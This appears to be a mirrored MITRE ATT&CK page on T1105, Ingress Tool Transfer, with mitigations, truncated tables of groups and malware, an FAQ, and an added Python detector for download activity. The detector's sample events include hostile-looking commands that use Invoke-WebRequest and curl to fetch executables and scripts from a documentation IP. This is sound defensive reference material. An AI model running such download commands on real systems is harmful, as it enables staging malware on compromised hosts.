Command and Control

T1105: Ingress Tool Transfer

T1105 · Technique · 5 platforms · 86 groups

Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas) A number of these tools, such as wget, curl, and scp, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via certutil -hashfile).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
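As an added example (not part of this page or of MITRE ATT&CK), the following Python sketch turns the utilities named above into process-creation detection logic: it flags the PowerShell download cradle, Windows LOLBins and Unix transfer tools invoked with a remote source, and package-manager installs, and it raises severity when a `certutil -hashfile` integrity check follows a download on the same host. The event schema `{ts, host, user, image, cmdline}` is an assumed simplification, and every sample event is constructed.

```python
"""Detection sketch for T1105 (Ingress Tool Transfer) over process-creation events.

Added example: the event shape {ts, host, user, image, cmdline} is an assumed,
simplified schema (not a Sysmon/EDR native one), and all sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Remote sources: URL schemes named on the page (http/https/ftp/tftp) ...
URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://\S+", re.IGNORECASE)
# ... and scp/sftp/rsync-style user@host:path specs.
REMOTE_SPEC_RE = re.compile(r"\S+@\S+:\S*")
# PowerShell download cradles: Net.WebClient DownloadString/DownloadFile, Invoke-WebRequest (alias iwr).
PS_CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.IGNORECASE
)
HASHFILE_RE = re.compile(r"certutil(?:\.exe)?\s+-hashfile\b", re.IGNORECASE)
PKG_MGR_RE = re.compile(r"^(?:sudo\s+)?(?:yum|winget)(?:\.exe)?\s+install\b", re.IGNORECASE)

# `copy` is a cmd.exe builtin, so it cannot be matched by image name and is not covered here.
WINDOWS_LOLBINS = {"certutil.exe", "finger.exe"}
UNIX_TRANSFER_TOOLS = {"curl", "wget", "scp", "sftp", "tftp", "rsync", "finger"}


@dataclass
class Finding:
    ts: int
    host: str
    rule: str
    severity: str
    cmdline: str


def basename(image: str) -> str:
    """Normalise a Windows or POSIX image path to its lowercase file name."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: dict) -> Optional[Finding]:
    """Map one process-creation event to a T1105 finding, or None if it looks benign."""
    name, cmd = basename(ev["image"]), ev["cmdline"]
    if name in {"powershell.exe", "pwsh.exe"} and PS_CRADLE_RE.search(cmd):
        return Finding(ev["ts"], ev["host"], "powershell_download_cradle", "high", cmd)
    if name in WINDOWS_LOLBINS and URL_RE.search(cmd):
        return Finding(ev["ts"], ev["host"], "windows_lolbin_url", "high", cmd)
    if name in {"finger", "finger.exe"} and "@" in cmd:
        return Finding(ev["ts"], ev["host"], "finger_remote_query", "medium", cmd)
    if name in UNIX_TRANSFER_TOOLS and (URL_RE.search(cmd) or REMOTE_SPEC_RE.search(cmd)):
        return Finding(ev["ts"], ev["host"], "unix_tool_remote_fetch", "medium", cmd)
    if PKG_MGR_RE.search(cmd):
        # Package managers are usually legitimate; keep them as low-severity context.
        return Finding(ev["ts"], ev["host"], "package_manager_install", "low", cmd)
    return None


def scan(events: list, window: int = 300) -> list:
    """Classify events in time order; escalate a download when the same host runs
    `certutil -hashfile` within `window` seconds (the integrity check described above)."""
    findings, last_download = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if HASHFILE_RE.search(ev["cmdline"]):
            prev = last_download.get(ev["host"])
            if prev is not None and 0 <= ev["ts"] - prev.ts <= window:
                prev.severity = "critical"
                prev.rule += "+hash_verification"
            continue  # a hash check on its own is not a transfer
        finding = classify(ev)
        if finding is not None:
            findings.append(finding)
            last_download[ev["host"]] = finding
    return findings


SAMPLE_EVENTS = [  # constructed; 203.0.113.0/24 is a documentation address range
    {"ts": 100, "host": "ws01", "user": "jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command \"Invoke-WebRequest http://203.0.113.10/tool.exe -OutFile C:\\Users\\Public\\tool.exe\""},
    {"ts": 130, "host": "ws01", "user": "jdoe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -hashfile C:\\Users\\Public\\tool.exe SHA256"},
    {"ts": 200, "host": "srv02", "user": "www-data", "image": "/usr/bin/curl",
     "cmdline": "curl -s http://203.0.113.10/x.sh -o /tmp/x.sh"},
    {"ts": 260, "host": "srv03", "user": "ops", "image": "/usr/bin/scp",
     "cmdline": "scp ops@203.0.113.10:/srv/bin/agent /tmp/agent"},
    {"ts": 300, "host": "srv04", "user": "root", "image": "/usr/bin/yum",
     "cmdline": "yum install -y htop"},
    {"ts": 320, "host": "ws05", "user": "asmith",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},  # benign: no download cradle
    {"ts": 400, "host": "ws07", "user": "bjones", "image": "C:\\Windows\\System32\\finger.exe",
     "cmdline": "finger user@203.0.113.10"},
    {"ts": 900, "host": "ws08", "user": "cdoe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -hashfile C:\\setup.msi SHA256"},  # no prior download: no finding
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.ts:>4} {f.host:<6} {f.severity:<8} {f.rule:<45} {f.cmdline}")
```

Running the block on the constructed events yields five findings; the ws01 download is escalated to critical because the hash check follows it within the window, while the lone hash check on ws08 produces nothing. The package-manager rule is deliberately low severity because `yum`/`winget` installs are routine on managed hosts; in practice it should be joined with an allowlist of approved repositories before it feeds an alert queue.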

Platforms

ESXi, Linux, macOS, Network Devices, Windows

Mitigations (2)

M1031: Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and w

M1037: Filter Network Traffic

Use network filtering to block outbound traffic from compromised systems to unapproved external destinations. Restricting access to known, trusted IP addresses and protocols can prevent attackers from downloading malicious tools or payloads onto compromised servers after gaining initial access.

Threat Groups (86)

| ID | Group | Context |
|---|---|---|
| G0117 | Fox Kitten | [Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) direct... |
| G1002 | BITTER | [BITTER](https://attack.mitre.org/groups/G1002) has downloaded additional malware and tools onto a compromised host.(Citation: Cisco Talos Bitter Bang... |
| G0125 | HAFNIUM | [HAFNIUM](https://attack.mitre.org/groups/G0125) has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.(Citation: ... |
| G0080 | Cobalt Group | [Cobalt Group](https://attack.mitre.org/groups/G0080) has used public sites such as github.com and sendspace.com to upload files and then download the... |
| G1021 | Cinnamon Tempest | [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) has downloaded files, including [Cobalt Strike](https://attack.mitre.org/software/S0154), to... |
| G1043 | BlackByte | [BlackByte](https://attack.mitre.org/groups/G1043) has transferred tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154) to victim en... |
| G0081 | Tropic Trooper | [Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper ... |
| G1015 | Scattered Spider | [Scattered Spider](https://attack.mitre.org/groups/G1015) has downloaded the Teleport remote access tool to compromised VMware vCenter Servers.(Citati... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has downloaded files, malware, and tools from its C2 onto a compromised host.(Citation: Novetta... |
| G0068 | PLATINUM | [PLATINUM](https://attack.mitre.org/groups/G0068) has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) chan... |
| G0004 | Ke3chang | [Ke3chang](https://attack.mitre.org/groups/G0004) has used tools to download files to compromised machines.(Citation: Microsoft NICKEL December 2021) |
| G0107 | Whitefly | [Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019) |
| G0067 | APT37 | [APT37](https://attack.mitre.org/groups/G0067) has downloaded second stage malware from compromised websites.(Citation: FireEye APT37 Feb 2018)(Citati... |
| G1008 | SideCopy | [SideCopy](https://attack.mitre.org/groups/G1008) has delivered trojanized executables via spearphishing emails that contact actor-controlled servers... |
| G1018 | TA2541 | [TA2541](https://attack.mitre.org/groups/G1018) has used malicious scripts and macros with the ability to download additional payloads.(Citation: Cis... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional scripts, tools, and malware onto victim systems.(Citation: Talos Kimsuky No... |
| G0010 | Turla | [Turla](https://attack.mitre.org/groups/G0010) has used shellcode to download Meterpreter after compromising a victim.(Citation: ESET Turla Mosquito M... |
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has downloaded additional malware and tools onto a compromised host.(Citation: Palo Alto Gama... |
| G0065 | Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has downloaded additional scripts and files from adversary-controlled servers.(Citation: Proofpoint... |
| G0045 | menuPass | [menuPass](https://attack.mitre.org/groups/G0045) has installed updates and new malware on victims.(Citation: PWC Cloud Hopper April 2017)(Citation: D... |

Associated Software (400)

| ID | Name | Type | Context |
|---|---|---|---|
| S0396 | EvilBunny | Malware | [EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014) |
| S0664 | Pandora | Malware | [Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April... |
| S0444 | ShimRat | Malware | [ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang) |
| S1228 | PUBLOAD | Malware | [PUBLOAD](https://attack.mitre.org/software/S1228) has acted as a stager that can download the next-stage payload from its C2 server.(Citation: Lab52 ... |
| S1118 | BUSHWALK | Malware | [BUSHWALK](https://attack.mitre.org/software/S1118) can write malicious payloads sent through a web request’s command parameter.(Citation: Mandiant Cu... |
| S1066 | DarkTortilla | Malware | [DarkTortilla](https://attack.mitre.org/software/S1066) can download additional packages for keylogging, cryptocurrency mining, and other capabilities... |
| S0627 | SodaMaster | Malware | [SodaMaster](https://attack.mitre.org/software/S0627) has the ability to download additional payloads from C2 to the targeted system.(Citation: Secure... |
| S1019 | Shark | Malware | [Shark](https://attack.mitre.org/software/S1019) can download additional files from its C2 via HTTP or DNS.(Citation: ClearSky Siamesekitten August 2... |
| S0284 | More_eggs | Malware | [More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Se... |
| S0185 | SEASHARPEE | Malware | [SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017) |
| S0515 | WellMail | Malware | [WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020) |
| S0255 | DDKONG | Malware | [DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018) |
| S1048 | macOS.OSAMiner | Malware | [macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `curl` to download a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/... |
| S0516 | SoreFang | Malware | [SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 ... |
| S1074 | ANDROMEDA | Malware | [ANDROMEDA](https://attack.mitre.org/software/S1074) can download additional payloads from C2.(Citation: Mandiant Suspected Turla Campaign February 20... |
| S1013 | ZxxZ | Malware | [ZxxZ](https://attack.mitre.org/software/S1013) can download and execute additional files.(Citation: Cisco Talos Bitter Bangladesh May 2022) |
| S0386 | Ursnif | Malware | [Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S038... |
| S1189 | Neo-reGeorg | Malware | [Neo-reGeorg](https://attack.mitre.org/software/S1189) has the ability to download files to targeted systems.(Citation: GitHub Neo-reGeorg 2019) |
| S0070 | HTTPBrowser | Malware | [HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-33... |
| S1028 | Action RAT | Malware | [Action RAT](https://attack.mitre.org/software/S1028) has the ability to download additional payloads onto an infected machine.(Citation: MalwareBytes... |

Frequently Asked Questions

What is T1105 (Ingress Tool Transfer)?

T1105 is a MITRE ATT&CK technique named 'Ingress Tool Transfer'. It belongs to the Command and Control tactic(s). Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network th...

How can T1105 be detected?

Detection of T1105 (Ingress Tool Transfer) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.

What mitigations exist for T1105?

There are 2 documented mitigations for T1105. Key mitigations include: Network Intrusion Prevention, Filter Network Traffic.

Which threat groups use T1105?

Known threat groups using T1105 include: Fox Kitten, BITTER, HAFNIUM, Cobalt Group, Cinnamon Tempest, BlackByte, Tropic Trooper, Scattered Spider.